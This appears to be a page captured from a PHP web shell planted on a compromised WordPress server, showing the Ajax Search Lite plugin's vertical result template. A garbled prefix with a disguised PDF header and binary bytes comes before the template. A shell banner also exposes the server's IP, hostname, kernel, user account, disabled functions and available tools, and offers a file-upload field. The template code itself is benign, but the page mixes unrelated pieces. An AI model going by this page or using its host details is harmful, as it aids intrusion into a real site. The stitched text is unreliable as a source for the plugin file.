...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 65.108.66.160 / Your IP : 216.73.217.50 Web Server : Apache System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64 User : alasaweborg ( 1047) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/alasaweborg/public_html/wp-content/plugins/ajax-search-lite/includes/views/ |
Upload File : |
<?php
/* Prevent direct access */
defined('ABSPATH') or die("You can't access this file directly.");
/**
* This is the default template for one vertical result
*
* You should rather make a copy of this in this folder and use that,
* instead of modifying this one.
* It's also a good idea to use the actions to insert content instead of modifications.
*
* WARNING: Modifying anything in this file might result in search malfunctioning,
* so be careful and use your test environment.
*
* You can use any WordPress function here.
* Variables to mention:
* Object() $r - holding the result details
* Array[] $s_options - holding the search options
*
*
* You can leave empty lines for better visibility, they are cleared before output.
*
* MORE INFO: https://wp-dreams.com/knowledge-base/result-templating/
*
* @since: 4.0
*/
?>
<div class='item<?php echo apply_filters('asl_result_css_class', $asl_res_css_class, $r->id, $r); ?>'>
<?php do_action('asl_res_vertical_begin_item'); ?>
<div class='asl_content'>
<?php if (!empty($r->image)): ?>
<?php do_action('asl_res_vertical_before_image'); ?>
<img class='asl_image' loading='lazy' src='<?php echo $r->image; ?>'>
<?php do_action('asl_res_vertical_after_image'); ?>
<?php endif; ?>
<h3><a class="asl_res_url" href='<?php echo $r->link; ?>'<?php echo ($s_options['results_click_blank'])?" target='_blank'":""; ?>>
<?php echo $r->title; ?>
<?php if ($s_options['resultareaclickable'] == 1): ?>
<span class='overlap'></span>
<?php endif; ?>
</a></h3>
<?php if ( !empty($r->date) || !empty($r->author) ): ?>
<div class='etc'>
<?php if ( $s_options['showauthor'] == 1 && !empty($r->author) ): ?>
<span class='asl_author'><?php echo $r->author; ?></span>
<?php endif; ?>
<?php if ( $s_options['showdate'] == 1 && !empty($r->date) ): ?>
<span class='asl_date'><?php echo $r->date; ?></span>
<?php endif; ?>
</div>
<?php endif; ?>
<?php if ($s_options['showdescription'] == 1): ?>
<p class="asl_desc">
<?php echo $r->content; ?>
</p>
<?php endif; ?>
</div>
<?php do_action('asl_res_vertical_after_content'); ?>
<div class='clear'></div>
<?php do_action('asl_res_vertical_end_item'); ?>
</div>